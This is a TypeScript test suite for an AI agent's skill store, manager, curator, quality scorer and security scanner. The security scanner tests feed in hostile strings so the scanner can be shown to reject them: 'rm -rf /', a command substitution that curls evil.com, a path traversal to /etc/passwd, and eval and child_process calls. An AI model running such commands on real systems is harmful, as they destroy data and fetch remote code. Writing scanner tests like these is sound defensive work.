import { describe, it, before, after } from 'node:test';
import assert from 'node:assert';
import * as fs from 'fs';
import * as path from 'path';
import { tmpdir } from 'os';
import { SkillStore } from '../src/skills/skillStore';
import { SkillManager } from '../src/skills/skillManager';
import { SkillInjector } from '../src/skills/skillInjector';
import { SkillCurator } from '../src/skills/skillCurator';
import { SkillViewTool } from '../src/skills/skillViewTool';
import { createAllTools } from '../src/tools/index';
import {
  computeDeterministicScore,
  evaluateWithRubric,
  buildRubricPrompt,
} from '../src/skills/skillQualityScorer';
import type { LLMRubricConfig } from '../src/skills/skillQualityScorer';
import type { Skill } from '../src/skills/types';
import {
  jaccardSimilarity,
  nameSimilarity,
  descriptionSimilarity,
  tagSimilarity,
  computeSimilarity,
  findSimilarPairs,
  buildMergePrompt,
} from '../src/skills/skillCurator';
import type { SkillCatalogEntry } from '../src/skills/types';
import { scanSkillContent, rejectReason } from '../src/skills/skillSecurityScanner';

// ============================================================================
// Helpers
// ============================================================================

function createTempDir(): string {
  return fs.mkdtempSync(path.join(tmpdir(), 'commander-skills-test-'));
}

function rmdirRecursive(dir: string): void {
  try {
    fs.rmSync(dir, { recursive: true, force: true });
  } catch {
    /* ignore cleanup errors */
  }
}

function makeSkillStore(tempDir: string): SkillStore {
  const skillsDir = path.join(tempDir, '.commander', 'skills');
  return new SkillStore(skillsDir);
}

// ============================================================================
// SkillStore Tests
// ============================================================================

describe('SkillStore', () => {
  let tempDir: string;
  let store: SkillStore;

  before(() => {
    tempDir = createTempDir();
    store = makeSkillStore(tempDir);
  });

  after(() => {
    rmdirRecursive(tempDir);
  });

  it('save and load roundtrip', async () => {
    const skill = {
      id: 'test-skill',
      name: 'test-skill',
      description: 'A test skill',
      content: '# Test Skill\n\nDo something useful.',
      tools: ['web_search', 'file_read'],
      metadata: {
        category: 'coding' as const,
        tags: ['test', 'example'],
        source: 'user' as const,
        qualityScore: 0.8,
        usageCount: 5,
        avgSuccessRate: 0.9,
        autoGenerated: false,
        createdAt: new Date().toISOString(),
        updatedAt: new Date().toISOString(),
      },
    };

    await store.save(skill);
    const loaded = await store.load('test-skill');
    assert.ok(loaded !== null, 'Should load saved skill');
    assert.strictEqual(loaded!.name, 'test-skill');
    assert.strictEqual(loaded!.description, 'A test skill');
    assert.strictEqual(loaded!.metadata.category, 'coding');
    assert.deepStrictEqual(loaded!.tools, ['web_search', 'file_read']);
    assert.strictEqual(loaded!.metadata.qualityScore, 0.8);
    assert.strictEqual(loaded!.metadata.usageCount, 5);
    assert.strictEqual(loaded!.metadata.avgSuccessRate, 0.9);
  });

  it('list returns saved skills', async () => {
    const names = await store.list();
    assert.ok(names.includes('test-skill'), 'Should list the saved skill');
  });

  it('load returns null for non-existent skill', async () => {
    const loaded = await store.load('nonexistent');
    assert.strictEqual(loaded, null);
  });

  it('delete removes skill', async () => {
    store = makeSkillStore(tempDir);
    await store.save({
      id: 'delete-me',
      name: 'delete-me',
      description: 'to be deleted',
      content: 'delete this',
      tools: [],
      metadata: {
        category: 'general',
        tags: [],
        source: 'user',
        qualityScore: 0.5,
        usageCount: 0,
        avgSuccessRate: 0.5,
        autoGenerated: false,
        createdAt: new Date().toISOString(),
        updatedAt: new Date().toISOString(),
      },
    });
    assert.ok(await store.exists('delete-me'), 'Should exist before delete');
    await store.delete('delete-me');
    assert.ok(!(await store.exists('delete-me')), 'Should not exist after delete');
  });

  it('rejects invalid skill names', async () => {
    try {
      await store.save({
        id: 'UPPERCASE',
        name: 'UPPERCASE',
        description: 'bad name',
        content: 'should fail',
        tools: [],
        metadata: {
          category: 'general',
          tags: [],
          source: 'user',
          qualityScore: 0.5,
          usageCount: 0,
          avgSuccessRate: 0.5,
          autoGenerated: false,
          createdAt: new Date().toISOString(),
          updatedAt: new Date().toISOString(),
        },
      });
      assert.fail('Should have thrown for invalid name');
    } catch (e: any) {
      assert.ok(
        e.message.includes('Invalid skill name'),
        `Expected validation error, got: ${e.message}`,
      );
    }
  });

  it('migrateFromJson handles empty directories', async () => {
    const count = await store.migrateFromJson();
    assert.strictEqual(count, 0, 'No JSON files should migrate');
  });

  it('YAML frontmatter roundtrip preserves tags and metadata', async () => {
    const skill = {
      id: 'yaml-roundtrip',
      name: 'yaml-roundtrip',
      description: 'YAML test',
      content: '# YAML\n\nTest content.',
      tools: ['web_search', 'file_read'],
      metadata: {
        category: 'research' as const,
        tags: ['yaml', 'parser', 'roundtrip'],
        source: 'user' as const,
        qualityScore: 0.95,
        usageCount: 42,
        avgSuccessRate: 0.88,
        autoGenerated: true,
        createdAt: '2025-01-01T00:00:00.000Z',
        updatedAt: '2025-06-01T00:00:00.000Z',
      },
    };

    await store.save(skill);
    const loaded = await store.load('yaml-roundtrip');
    assert.ok(loaded !== null, 'Should load after save');
    assert.deepStrictEqual(loaded!.metadata.tags, ['yaml', 'parser', 'roundtrip']);
    assert.strictEqual(loaded!.metadata.category, 'research');
    assert.strictEqual(loaded!.metadata.qualityScore, 0.95);
    assert.strictEqual(loaded!.metadata.usageCount, 42);
    assert.strictEqual(loaded!.metadata.avgSuccessRate, 0.88);
    assert.strictEqual(loaded!.metadata.autoGenerated, true);
    assert.strictEqual(loaded!.tools.join(' '), 'web_search file_read');
  });
});

// ============================================================================
// SkillManager Tests
// ============================================================================

describe('SkillManager', () => {
  let tempDir: string;
  let store: SkillStore;
  let manager: SkillManager;

  before(() => {
    tempDir = createTempDir();
    store = makeSkillStore(tempDir);
    manager = new SkillManager(store);
  });

  after(() => {
    rmdirRecursive(tempDir);
  });

  it('create returns a skill with defaults', async () => {
    const skill = await manager.create(
      'my-first-skill',
      '# My First Skill\n\nStep-by-step instructions.',
      { category: 'coding', tags: ['typescript'], source: 'user' },
    );
    assert.ok(skill.id.length > 0, 'Should have an id');
    assert.strictEqual(skill.name, 'my-first-skill');
    assert.strictEqual(skill.description, 'My First Skill');
    assert.ok(skill.content.includes('My First Skill'));
    assert.strictEqual(skill.metadata.category, 'coding');
    assert.ok(Math.abs(skill.metadata.qualityScore - 0.335) < 0.001);
    assert.strictEqual(skill.metadata.usageCount, 0);
  });

  it('get returns null for missing skill', async () => {
    const skill = await manager.get('does-not-exist');
    assert.strictEqual(skill, null);
  });

  it('get returns created skill', async () => {
    const skill = await manager.get('my-first-skill');
    assert.ok(skill !== null);
    assert.strictEqual(skill!.name, 'my-first-skill');
  });

  it('list returns catalog entries', async () => {
    const catalog = await manager.list();
    assert.ok(catalog.length >= 1);
    const entry = catalog.find((e) => e.name === 'my-first-skill');
    assert.ok(entry, 'Should find the created skill in catalog');
    assert.strictEqual(entry!.description, 'My First Skill');
    assert.strictEqual(entry!.category, 'coding');
    assert.deepStrictEqual(entry!.tags, ['typescript']);
  });

  it('update modifies skill metadata', async () => {
    await manager.create('updatable', 'content', { category: 'general', tags: [], source: 'user' });
    const updated = await manager.update('updatable', {
      description: 'Updated description',
      metadata: { qualityScore: 0.9 },
    } as any);
    assert.strictEqual(updated.description, 'Updated description');
    assert.strictEqual(updated.metadata.qualityScore, 0.9);
  });

  it('delete removes skill', async () => {
    await manager.create('temporary', 'temp content', {
      category: 'general',
      tags: [],
      source: 'user',
    });
    assert.ok((await manager.get('temporary')) !== null, 'Should exist before delete');
    await manager.delete('temporary');
    assert.strictEqual(await manager.get('temporary'), null, 'Should be null after delete');
  });

  it('search filters by text', async () => {
    const results = await manager.search({ text: 'my-first' });
    assert.ok(results.length > 0);
    assert.ok(results.some((r) => r.name === 'my-first-skill'));
  });

  it('search filters by category', async () => {
    const results = await manager.search({ category: 'coding' });
    assert.ok(results.length > 0);
    assert.ok(results.every((r) => r.category === 'coding'));
  });

  it('search filters by tags', async () => {
    const results = await manager.search({ tags: ['typescript'] });
    assert.ok(results.length > 0);
    assert.ok(results.some((r) => r.name === 'my-first-skill'));
  });

  it('search respects limit', async () => {
    const results = await manager.search({ limit: 1 });
    assert.ok(results.length <= 1);
  });

  it('suggestForTask returns relevant skills', async () => {
    await manager.create('python-tool', 'For Python scripting', {
      category: 'coding',
      tags: ['python'],
      source: 'user',
    });
    const suggestions = await manager.suggestForTask('write a python script', 2);
    assert.ok(suggestions.length > 0);
    assert.ok(
      suggestions.some((s) => s.name === 'python-tool'),
      'Should suggest the python skill',
    );
  });

  it('suggestForTask returns empty for irrelevant goal', async () => {
    const suggestions = await manager.suggestForTask('xyzzy unknown', 2);
    assert.strictEqual(suggestions.length, 0);
  });

  it('recordUsage tracks usage count and success rate', async () => {
    await manager.recordUsage('my-first-skill', true);
    const skill = await manager.get('my-first-skill');
    assert.strictEqual(skill!.metadata.usageCount, 1);
    assert.strictEqual(skill!.metadata.avgSuccessRate, 1.0);

    await manager.recordUsage('my-first-skill', false);
    const skill2 = await manager.get('my-first-skill');
    assert.strictEqual(skill2!.metadata.usageCount, 2);
    assert.strictEqual(skill2!.metadata.avgSuccessRate, 0.5);
  });

  it('exportSkill generates YAML frontmatter', async () => {
    const exported = await manager.exportSkill('my-first-skill');
    assert.ok(exported !== null);
    assert.ok(exported!.startsWith('---'), 'Should start with YAML frontmatter delimiter');
    assert.ok(exported!.includes('name: my-first-skill'));
    assert.ok(exported!.includes('compatibility: commander'));
    assert.ok(exported!.includes('---'), 'Should end frontmatter delimiter');
    assert.ok(exported!.includes('# My First Skill'), 'Should include the body');
  });

  it('exportSkill returns null for missing skill', async () => {
    const exported = await manager.exportSkill('nonexistent-skill');
    assert.strictEqual(exported, null);
  });

  it('getSkillPath returns the on-disk directory path', () => {
    const dirPath = manager.getSkillPath('my-first-skill');
    assert.ok(dirPath.includes('my-first-skill'), 'Path should include skill name');
    assert.ok(dirPath.endsWith('my-first-skill'), 'Path should end with skill name');
  });
});

// ============================================================================
// SkillInjector Tests
// ============================================================================

describe('SkillInjector', () => {
  let tempDir: string;
  let manager: SkillManager;
  let injector: SkillInjector;

  before(async () => {
    tempDir = createTempDir();
    const store = makeSkillStore(tempDir);
    manager = new SkillManager(store);
    injector = new SkillInjector(manager);

    // Create a few test skills
    await manager.create('web-scraper', '# Web Scraper\n\nScrape websites.', {
      category: 'coding',
      tags: ['web', 'python'],
      source: 'user',
    });
    await manager.create('data-analyzer', '# Data Analyzer\n\nAnalyze CSV data.', {
      category: 'analysis',
      tags: ['data', 'csv'],
      source: 'user',
    });
  });

  after(() => {
    rmdirRecursive(tempDir);
  });

  it('buildSkillsBlock returns Level 0 catalog with skill names and quality', async () => {
    const block = await injector.buildSkillsBlock('any task', 0);
    assert.ok(block.includes('## Available Skills'));
    assert.ok(block.includes('web-scraper'));
    assert.ok(block.includes('data-analyzer'));
    assert.ok(block.includes('quality:'));
  });

  it('buildSkillsBlock returns empty string for empty catalog', async () => {
    const emptyStore = makeSkillStore(createTempDir());
    const emptyManager = new SkillManager(emptyStore);
    const emptyInjector = new SkillInjector(emptyManager);
    const block = await emptyInjector.buildSkillsBlock('test', 0);
    assert.strictEqual(block, '');
  });

  it('buildSkillUsageInstructions mentions skill_view tool', () => {
    const instructions = injector.buildSkillUsageInstructions();
    assert.ok(instructions.includes('skill_view'), 'Should mention skill_view tool');
    assert.ok(instructions.includes('Skill Usage'), 'Should have a heading');
  });
});

// ============================================================================
// SkillViewTool Tests
// ============================================================================

describe('SkillViewTool', () => {
  let tool: SkillViewTool;

  before(() => {
    tool = new SkillViewTool();
  });

  it('has correct metadata', () => {
    assert.strictEqual(tool.definition.name, 'skill_view');
    assert.ok(tool.definition.description.length > 0);
    assert.strictEqual(tool.isConcurrencySafe, true);
    assert.strictEqual(tool.isReadOnly, true);
    assert.strictEqual(tool.timeout, 5000);
    assert.strictEqual(tool.maxOutputSize, 20000);
  });

  it('input schema requires name', () => {
    const schema = tool.definition.inputSchema as any;
    assert.ok(schema.required.includes('name'));
    assert.strictEqual(schema.properties.name.type, 'string');
  });

  it('returns error for empty name', async () => {
    const result = await tool.execute({});
    assert.ok(result.startsWith('Error:'));
    assert.ok(result.includes('skill name is required'));
  });

  it('returns not found for unknown skill', async () => {
    const result = await tool.execute({ name: 'does-not-exist-12345' });
    assert.ok(result.includes('not found'));
  });
});

// ============================================================================
// SkillCurator Tests
// ============================================================================

describe('SkillCurator', () => {
  let tempDir: string;
  let store: SkillStore;
  let manager: SkillManager;
  let curator: SkillCurator;
  let archiveDir: string;
  let backupDir: string;

  before(async () => {
    tempDir = createTempDir();
    archiveDir = path.join(tempDir, '.archive');
    backupDir = path.join(tempDir, '.backups');
    store = makeSkillStore(tempDir);
    manager = new SkillManager(store);
    curator = new SkillCurator(manager, archiveDir, backupDir);

    // Create test skills
    await manager.create('high-quality', 'Excellent skill content', {
      category: 'coding',
      tags: ['a'],
      source: 'user',
      qualityScore: 0.9,
      usageCount: 10,
    });
    await manager.create('medium-quality', 'Decent skill content', {
      category: 'coding',
      tags: ['b'],
      source: 'user',
      qualityScore: 0.6,
      usageCount: 5,
    });
    await manager.create('low-quality', 'Poor skill content', {
      category: 'general',
      tags: ['c'],
      source: 'user',
      qualityScore: 0.2,
      usageCount: 1,
    });
  });

  after(() => {
    rmdirRecursive(tempDir);
  });

  it('archive moves skill to archive directory', async () => {
    const result = await curator.archive('low-quality');
    assert.strictEqual(result, true);
    assert.ok(fs.existsSync(path.join(archiveDir, 'low-quality')), 'Archive dir should exist');
    assert.ok(
      !fs.existsSync(path.join(tempDir, '.commander', 'skills', 'low-quality')),
      'Original should be removed',
    );
  });

  it('listArchived returns archived skill names', async () => {
    const archived = await curator.listArchived();
    assert.ok(archived.includes('low-quality'), 'Should list the archived skill');
  });

  it('restore moves skill back from archive', async () => {
    const result = await curator.restore('low-quality');
    assert.strictEqual(result, true);
    const loaded = await manager.get('low-quality');
    assert.ok(loaded !== null, 'Skill should be restored');
    assert.ok(Math.abs(loaded!.metadata.qualityScore - 0.29) < 0.001);
  });

  it('archive handles non-existent skill gracefully', async () => {
    const result = await curator.archive('does-not-exist');
    assert.strictEqual(result, false);
  });

  it('restore handles non-existent archive gracefully', async () => {
    const result = await curator.restore('does-not-exist');
    assert.strictEqual(result, false);
  });

  it('restore fails if skill already exists at destination', async () => {
    // Archive then try to restore while original is still there
    await curator.archive('high-quality');
    await manager.create('high-quality', 'Recreated', {
      category: 'general',
      tags: [],
      source: 'user',
      qualityScore: 0.5,
      usageCount: 0,
    });
    const result = await curator.restore('high-quality');
    assert.strictEqual(result, false, 'Should not restore if destination exists');
    // Cleanup
    await manager.delete('high-quality');
    await curator.restore('high-quality');
  });

  it('curate pipeline archives low-quality skills', async () => {
    // Re-archive low-quality for the curate run
    await curator.archive('low-quality');
    // low-quality is already archived, so curate should find no more to archive
    const report = await curator.curate();
    assert.ok(report.totalBefore >= 0);
    assert.ok(report.runTimestamp.length > 0);
    assert.ok(Array.isArray(report.archived));
    assert.ok(Array.isArray(report.consolidated));
  });
});

// ============================================================================
// Integration Tests
// ============================================================================

describe('Skills Integration', () => {
  it('createAllTools includes skill_view', () => {
    const tools = createAllTools();
    assert.ok(tools.has('skill_view'), 'skill_view tool should be registered');
    const tool = tools.get('skill_view')!;
    assert.strictEqual(tool.definition.name, 'skill_view');
    assert.strictEqual(tool.isConcurrencySafe, true);
    assert.strictEqual(tool.isReadOnly, true);
  });
});

// ============================================================================
// SkillQualityScorer Tests
// ============================================================================

describe('SkillQualityScorer', () => {
  const makeSkill = (overrides?: Partial<Skill>): Skill => ({
    id: 'test-skill',
    name: 'test-skill',
    description: 'A test skill',
    content: '# Test Skill\n\nDo something useful.\n\n```python\nprint("hello")\n```',
    tools: ['web_search'],
    metadata: {
      category: 'coding',
      tags: ['test', 'example'],
      source: 'user',
      qualityScore: 0.5,
      usageCount: 5,
      avgSuccessRate: 0.8,
      autoGenerated: false,
      pinned: false,
      createdAt: new Date().toISOString(),
      updatedAt: new Date().toISOString(),
    },
    ...overrides,
  });

  it('computeDeterministicScore returns factors and total', () => {
    const skill = makeSkill();
    const result = computeDeterministicScore(skill);
    assert.ok(result.total >= 0 && result.total <= 1, 'Score should be 0-1');
    assert.ok(result.factors.length >= 4, 'Should have multiple factors');
    const hasTools = result.factors.find((f) => f.name === 'has_tools');
    assert.ok(hasTools, 'Should include has_tools factor');
    assert.strictEqual(hasTools!.score, 1, 'Skills with tools should score 1 on has_tools');
  });

  it('computeDeterministicScore penalizes empty skills', () => {
    const empty = makeSkill({
      content: 'minimal',
      description: 'minimal',
      tools: [],
      metadata: {
        category: 'general',
        tags: [],
        source: 'user',
        qualityScore: 0.5,
        usageCount: 0,
        avgSuccessRate: 0.5,
        autoGenerated: false,
        pinned: false,
        createdAt: new Date().toISOString(),
        updatedAt: new Date().toISOString(),
      },
    });
    const result = computeDeterministicScore(empty);
    assert.ok(result.total < 0.5, 'Empty skills should score below 0.5');
  });

  it('evaluateWithRubric returns null when evaluator fails', async () => {
    const skill = makeSkill();
    const config: LLMRubricConfig = {
      criteria: [{ name: 'clarity', description: 'Clear instructions?', score: 0, weight: 1.0 }],
      evaluator: async () => null,
    };
    const result = await evaluateWithRubric(skill, config);
    assert.strictEqual(result, null, 'Should return null on evaluator failure');
  });

  it('evaluateWithRubric parses valid LLM responses', async () => {
    const skill = makeSkill();
    const config: LLMRubricConfig = {
      criteria: [
        { name: 'clarity', description: 'Clear?', score: 0, weight: 0.5 },
        { name: 'actionability', description: 'Actionable?', score: 0, weight: 0.5 },
      ],
      evaluator: async () => [0.9, 0.7],
    };
    const factors = await evaluateWithRubric(skill, config);
    assert.ok(factors !== null, 'Should return factors');
    assert.strictEqual(factors!.length, 2);
    assert.strictEqual(factors![0].name, 'llm_clarity');
    assert.strictEqual(factors![0].score, 0.9);
    assert.strictEqual(factors![1].score, 0.7);
  });

  it('buildRubricPrompt includes skill content and criteria', () => {
    const skill = makeSkill();
    const criteria = [{ name: 'clarity', description: 'Is it clear?', score: 0, weight: 1.0 }];
    const prompt = buildRubricPrompt(skill, criteria);
    assert.ok(prompt.includes('test-skill'), 'Should include skill name');
    assert.ok(prompt.includes('clarity'), 'Should include criterion name');
    assert.ok(prompt.includes('JSON array'), 'Should include format instruction');
  });
});

// ============================================================================
// Similarity & Dedup Tests
// ============================================================================

describe('Similarity Functions', () => {
  it('jaccardSimilarity returns 1 for identical arrays', () => {
    assert.strictEqual(jaccardSimilarity(['a', 'b', 'c'], ['a', 'b', 'c']), 1);
  });

  it('jaccardSimilarity returns 0 for disjoint arrays', () => {
    assert.strictEqual(jaccardSimilarity(['a', 'b'], ['c', 'd']), 0);
  });

  it('jaccardSimilarity returns 0 for empty arrays', () => {
    assert.strictEqual(jaccardSimilarity([], []), 0);
  });

  it('jaccardSimilarity computes partial overlap', () => {
    const sim = jaccardSimilarity(['a', 'b', 'c'], ['b', 'c', 'd']);
    // intersection = {b, c} = 2, union = {a, b, c, d} = 4
    assert.strictEqual(sim, 0.5);
  });

  it('nameSimilarity matches identical names', () => {
    assert.strictEqual(nameSimilarity('python-script', 'python-script'), 1);
  });

  it('nameSimilarity matches similar names partially', () => {
    const sim = nameSimilarity('python-script', 'python-analysis');
    assert.ok(sim > 0, 'Similar names should have positive similarity');
    assert.ok(sim < 1, 'Different names should not have perfect similarity');
  });

  it('descriptionSimilarity matches shared words', () => {
    const sim = descriptionSimilarity('Analyze data with Python', 'Analyze data with pandas');
    assert.ok(sim > 0, 'Shared words should produce positive similarity');
  });

  it('tagSimilarity uses Jaccard on tags', () => {
    assert.strictEqual(tagSimilarity(['a', 'b'], ['a', 'b', 'c']), 2 / 3);
  });

  it('computeSimilarity combines name, desc, tag scores', () => {
    const a: SkillCatalogEntry = {
      name: 'python-data',
      description: 'Python data analysis',
      category: 'coding',
      tags: ['python', 'data'],
      usageCount: 5,
      qualityScore: 0.8,
      pinned: false,
    };
    const b: SkillCatalogEntry = {
      name: 'python-analysis',
      description: 'Data analysis with Python',
      category: 'coding',
      tags: ['python', 'analysis'],
      usageCount: 3,
      qualityScore: 0.7,
      pinned: false,
    };
    const score = computeSimilarity(a, b);
    assert.ok(score > 0, 'Similar entries should have positive similarity');
    assert.ok(score <= 1, 'Similarity should not exceed 1');
  });

  it('findSimilarPairs returns pairs above threshold', () => {
    const entries: SkillCatalogEntry[] = [
      {
        name: 'data-analysis-py',
        description: 'data analysis',
        category: 'coding',
        tags: ['python', 'data'],
        usageCount: 1,
        qualityScore: 0.5,
        pinned: false,
      },
      {
        name: 'python-data-analyzer',
        description: 'data analysis python',
        category: 'coding',
        tags: ['python', 'data', 'analysis'],
        usageCount: 1,
        qualityScore: 0.5,
        pinned: false,
      },
      {
        name: 'web-scraper',
        description: 'scrape websites',
        category: 'general',
        tags: ['web'],
        usageCount: 1,
        qualityScore: 0.5,
        pinned: false,
      },
    ];
    const pairs = findSimilarPairs(entries);
    const pairNames = pairs.map(([a, b]) => [a.name, b.name].sort().join('-'));
    assert.ok(
      pairNames.some((p) => p.includes('data')),
      'Similar data skills pair should be found',
    );
  });

  it('buildMergePrompt includes both skill contents', () => {
    const primary: Skill = {
      id: 'primary',
      name: 'primary-skill',
      description: 'Primary',
      content: '# Primary Content',
      tools: [],
      metadata: {
        category: 'coding',
        tags: [],
        source: 'user',
        qualityScore: 0.8,
        usageCount: 5,
        avgSuccessRate: 0.9,
        autoGenerated: false,
        pinned: false,
        createdAt: '',
        updatedAt: '',
      },
    };
    const duplicate: Skill = {
      id: 'dup',
      name: 'dup-skill',
      description: 'Duplicate',
      content: '# Duplicate Content',
      tools: [],
      metadata: {
        category: 'coding',
        tags: [],
        source: 'user',
        qualityScore: 0.6,
        usageCount: 2,
        avgSuccessRate: 0.7,
        autoGenerated: false,
        pinned: false,
        createdAt: '',
        updatedAt: '',
      },
    };
    const prompt = buildMergePrompt(primary, duplicate);
    assert.ok(prompt.includes('Primary Content'), 'Should include primary content');
    assert.ok(prompt.includes('Duplicate Content'), 'Should include duplicate content');
    assert.ok(prompt.includes('primary-skill'), 'Should include primary name');
    assert.ok(prompt.includes('merging'), 'Should indicate merge intent');
  });
});

// ============================================================================
// Security Scanner Tests
// ============================================================================

describe('SkillSecurityScanner', () => {
  it('passes clean content', () => {
    const result = scanSkillContent('safe-skill', '# Safe Skill\n\nDo something useful.', []);
    assert.ok(result.passed, 'Clean content should pass');
    assert.strictEqual(result.warnings.length, 0);
  });

  it('detects shell injection via backtick', () => {
    const result = scanSkillContent('bad', 'Run `rm -rf /` in the command', []);
    assert.ok(!result.passed, 'Should fail security check');
    assert.ok(
      result.warnings.some((w) => w.category === 'shell_injection'),
      'Shell injection warning',
    );
  });

  it('detects shell injection via $()', () => {
    const result = scanSkillContent('bad', 'Run $(curl http://evil.com)', []);
    assert.ok(!result.passed, 'Should fail security check');
  });

  it('detects API keys in content', () => {
    const result = scanSkillContent(
      'leaky',
      'Use api_key = "sk-test-key-placeholder-do-not-use-in-production"',
      [],
    );
    assert.ok(!result.passed, 'Should fail with API key');
    assert.ok(
      result.warnings.some((w) => w.category === 'sensitive_data'),
      'Sensitive data warning',
    );
  });

  it('detects path traversal', () => {
    const result = scanSkillContent('traverse', 'Read from ../../../etc/passwd', []);
    assert.ok(!result.passed, 'Should fail with path traversal');
    assert.ok(
      result.warnings.some((w) => w.category === 'path_traversal'),
      'Path traversal warning',
    );
  });

  it('detects private key blocks', () => {
    const result = scanSkillContent(
      'key-leak',
      '-----BEGIN TEST PRIVATE KEY-----\nTHIS IS A TEST FIXTURE NOT A REAL KEY\n-----END TEST PRIVATE KEY-----',
      [],
    );
    assert.ok(!result.passed, 'Should fail with private key');
  });

  it('detects child_process require', () => {
    const result = scanSkillContent('dangerous', 'const cp = require("child_process")', []);
    assert.ok(!result.passed, 'Should fail with dangerous API');
    assert.ok(
      result.warnings.some((w) => w.category === 'dangerous_api'),
      'Dangerous API warning',
    );
  });

  it('detects eval calls', () => {
    const result = scanSkillContent('eval-skill', 'eval(userInput)', []);
    assert.ok(!result.passed, 'Should fail with eval');
  });

  it('rejectReason returns null for clean results', () => {
    const result = scanSkillContent('safe', '# Clean', []);
    assert.strictEqual(rejectReason(result), null);
  });

  it('rejectReason returns message for high-severity issues', () => {
    const result = scanSkillContent('bad', 'eval(dangerous)', []);
    const reason = rejectReason(result);
    assert.ok(reason !== null, 'Should return rejection reason');
    assert.ok(reason!.includes('Skill content rejected'), 'Should mention rejection');
  });
});

// ============================================================================
// Integration: Security on Create
// ============================================================================

describe('SkillManager Security Integration', () => {
  let tempDir: string;
  let store: SkillStore;
  let manager: SkillManager;

  before(() => {
    tempDir = createTempDir();
    store = makeSkillStore(tempDir);
    manager = new SkillManager(store);
  });

  after(() => {
    rmdirRecursive(tempDir);
  });

  it('rejects creation of skill with shell injection', async () => {
    try {
      await manager.create('dangerous-skill', 'Run `rm -rf /` to clean up', {
        category: 'general',
        tags: [],
        source: 'user',
      });
      assert.fail('Should have thrown for dangerous content');
    } catch (e: any) {
      assert.ok(e.message.includes('Skill content rejected'), 'Should reject dangerous content');
    }
  });

  it('accepts creation of clean skill', async () => {
    const skill = await manager.create('clean-skill', '# Clean Skill\n\nDo something safe.', {
      category: 'general',
      tags: [],
      source: 'user',
    });
    assert.ok(skill !== null, 'Clean skill should be created');
    assert.strictEqual(skill.name, 'clean-skill');
  });
});

// ============================================================================
// Integration: Curator with Enhanced Dedup
// ============================================================================

describe('SkillCurator Enhanced Dedup', () => {
  let tempDir: string;
  let store: SkillStore;
  let manager: SkillManager;
  let curator: SkillCurator;
  let archiveDir: string;
  let backupDir: string;

  before(async () => {
    tempDir = createTempDir();
    archiveDir = path.join(tempDir, '.archive');
    backupDir = path.join(tempDir, '.backups');
    store = makeSkillStore(tempDir);
    manager = new SkillManager(store);
    curator = new SkillCurator(manager, archiveDir, backupDir);

    await manager.create('data-analysis-py', 'Python-based data analysis with pandas', {
      category: 'coding',
      tags: ['python', 'data', 'analysis'],
      source: 'user',
      qualityScore: 0.8,
      usageCount: 10,
    });
    await manager.create('python-data-analyzer', 'Data analysis using Python tools', {
      category: 'coding',
      tags: ['python', 'data'],
      source: 'user',
      qualityScore: 0.7,
      usageCount: 5,
    });
    await manager.create('unrelated-web', 'Web scraping with cheerio', {
      category: 'coding',
      tags: ['web', 'scraping'],
      source: 'user',
      qualityScore: 0.6,
      usageCount: 3,
    });
  });

  after(() => {
    rmdirRecursive(tempDir);
  });

  it('curate consolidates similar skills', async () => {
    const report = await curator.curate();
    assert.ok(report.totalBefore >= 3, 'Should start with 3+ skills');
    assert.ok(Array.isArray(report.consolidated), 'Should have consolidated array');
    assert.ok(report.runTimestamp.length > 0);
  });

  it('mergeSimilar keeps highest quality skill', async () => {
    const catalog: SkillCatalogEntry[] = [
      {
        name: 'low',
        description: 'low quality',
        category: 'coding',
        tags: ['a'],
        usageCount: 1,
        qualityScore: 0.3,
        pinned: false,
      },
      {
        name: 'high',
        description: 'high quality',
        category: 'coding',
        tags: ['a'],
        usageCount: 10,
        qualityScore: 0.9,
        pinned: false,
      },
    ];
    const result = await curator.mergeSimilar(catalog, 'keep_highest_quality');
    assert.strictEqual(result.survivor, 'high', 'Should keep highest quality skill');
    assert.ok(result.archived.includes('low'), 'Should archive lower quality skill');
  });
});
